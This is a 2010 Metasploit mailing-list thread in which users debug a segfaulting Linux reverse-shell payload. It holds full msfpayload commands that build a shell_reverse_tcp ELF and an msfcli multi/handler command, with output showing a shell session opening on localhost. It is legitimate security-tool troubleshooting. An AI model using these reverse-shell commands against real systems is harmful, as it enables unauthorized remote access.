Metasploit mailing list archives
Re: Linux payloads broken
From: Florian Roth <Neo.X () web de>
Date: Fri, 07 May 2010 18:05:18 +0200
It seems to me that Ramon is right. I get the same segmentation fault message and the kernel as the OS is similar to yours. BUT - with a listening handler - everything works out fine. --- Term 1 neo@ubuntu:/hack/framework3$ ./msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=80 X >out.elf Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell_reverse_tcp Length: 71 Options: LHOST=127.0.0.1,LPORT=80 neo@ubuntu:/hack/framework3$ ./out.elf Segmentation fault neo@ubuntu:/hack/framework3$ file out.elf out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size neo@ubuntu:/hack/framework3$ uname -a Linux ubuntu 2.6.32-22-generic #33-Ubuntu SMP Wed Apr 28 13:27:30 UTC 2010 i686 GNU/Linux --- Term 2 neo@ubuntu:/hack/framework3$ sudo ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=80 E [sudo] password for neo: [*] Please wait while we load the module tree... --- Term 1 neo@ubuntu:/hack/framework3$ ./out.elf --- Term 2 [*] Started reverse handler on 127.0.0.1:80 [*] Starting the payload handler... [*] Command shell session 1 opened (127.0.0.1:80 -> 127.0.0.1:49928) ---------------- I used svn r9101 updated 20 days ago (2010.04.17) So please check again if the handler is set right and nothing interferes with the reverse connect. Best, Florian On Fri, 2010-05-07 at 18:00 +0300, Konrads Smelkovs wrote:
Strace shows that it segfaults before any syscalls are placed.
furthermore, it appears that exec headers are corrupt. wether I have
listener or not on the other end doesn't matter.
--
Konrads Smelkovs
Applied IT sorcery.
On Fri, May 7, 2010 at 3:53 PM, Ramon de Carvalho Valle
<ramon () metasploit com> wrote:
Did you set a listener on the selected port?
-Ramon
On 05/07/2010 05:21 AM, Konrads Smelkovs wrote:
> konrads@konrads-laptop:~/msf2$ ./msfpayload
linux/x86/shell_reverse_tcp
> LHOST=127.0.0.1 LPORT=80 X >out.elf
> Created by msfpayload (http://www.metasploit.com).
> Payload: linux/x86/shell_reverse_tcp
> Length: 71
> Options: LHOST=127.0.0.1,LPORT=80
> konrads@konrads-laptop:~/msf2$ file out.elf
> out.elf: ELF 32-bit LSB executable, Intel 80386, version 1
(SYSV),
> statically linked, *corrupted section header size*
> konrads@konrads-laptop:~/msf2$ chmod +x out.elf
> konrads@konrads-laptop:~/msf2$ ./out.elf
> *Segmentation fault*
> konrads@konrads-laptop:~/msf2$ uname -a
> Linux konrads-laptop 2.6.31-20-generic #58-Ubuntu SMP Fri
Mar 12 05:23:09
> UTC 2010 i686 GNU/Linux
>
>
> Same for metsvc_reverse_tcp payload
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
>
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
-- Sincerely Saludos cordiales Mit freundlichen Grüßen Florian Roth Tel: +49 06251 - 827 9402 Mobil: +49 175 - 7240 363 Fax: +49 12125 - 11699510 eMail: Florian.Roth () email de _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Florian Roth (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken egypt (May 07)
- Re: Linux payloads broken Konrads Smelkovs (May 08)
- Re: Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)